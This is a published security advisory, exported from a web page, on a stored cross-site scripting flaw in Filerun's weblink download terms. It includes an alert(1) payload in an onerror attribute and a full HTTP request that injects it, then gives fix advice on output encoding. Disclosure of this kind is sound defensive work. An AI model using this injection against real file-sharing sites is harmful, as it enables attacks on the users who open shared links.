{"id":18998,"date":"2022-10-01T13:53:00","date_gmt":"2022-10-01T11:53:00","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2022-0009\/"},"modified":"2022-11-03T16:09:06","modified_gmt":"2022-11-03T15:09:06","slug":"usd-2022-0009","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0009\/","title":{"rendered":"usd-2022-0009"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.18.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

<\/h1>\n

usd-2022-0009 | Stored XSS in Filerun (Update 20220202)<\/h1>\n

Advisory ID<\/strong>: usd-2022-0009
Product<\/strong>: Filerun
Affected Version<\/strong>: Update 20220202
Vulnerability Type<\/strong>: CWE-79: Improper Neutralization of Input During Web Page Generation
Security Risk<\/strong>: High
Vendor URL<\/strong>: https:\/\/filerun.com<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed<\/p>\n

Introduction<\/h3>\n

Filerun does not properly validate user supplied input. Because of this, a user is able to inject custom javascript into the download terms<\/em> for shared files using weblinks. This can lead to stored XSS attacks.<\/p>\n

Proof of Concept<\/h3>\n

To reproduce the vulnerability, the \"download_terms\" GET parameter is set as follows: \"download_terms=<img src=x onerror=alert(1)>\"<\/p>\n

In the following, an exemplary HTTP request is given:<\/p>\n

\n
<\/span>POST<\/span> \/?module=weblinks&section=ajax&page=update<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:99.0) Gecko\/20100101 Firefox\/99.0<\/span>\nAccept<\/span>:<\/span> *\/*<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.5<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate<\/span>\nX-Requested-With<\/span>:<\/span> XMLHttpRequest<\/span>\nContent-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>\nContent-Length<\/span>:<\/span> 208<\/span>\nOrigin<\/span>:<\/span> [http:\/\/localhost]()<\/span>\nConnection<\/span>:<\/span> close<\/span>\nReferer<\/span>:<\/span> [http:\/\/localhost\/?module=weblinks&_popup_id=webLink]()<\/span>\nCookie<\/span>:<\/span> FileRunSID=a6534d23bf316c6f7b91b0ca1de98e4d<\/span>\nSec-Fetch-Dest<\/span>:<\/span> empty<\/span>\nSec-Fetch-Mode<\/span>:<\/span> cors<\/span>\nSec-Fetch-Site<\/span>:<\/span> same-origin<\/span><\/pre>\n
 <\/p>\n
path=%2FROOT%2FHOME%2Fcmd.gif.php&download_terms=%3Cimg%20src%3D%2FX%20onerror%3Dalert(1)%3E&allow_downloads=on&expiry=&download_limit=&password=&dterms=%3Cimg%20src%3D%22%2FX%22%20onerror%3D%22alert(1)%22%3E<\/p>\n<\/div>\n
The payload is triggered, when a user is visiting the created share link:<\/p>\n
\"\"<\/p>\n
Fix<\/h3>\n
It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context. The majority of programming languages support standard procedures for encoding meta characters. For example, PHP has the built-in function htmlspecialchars()<\/em>.<\/p>\n
 <\/p>\n
References<\/h3>\n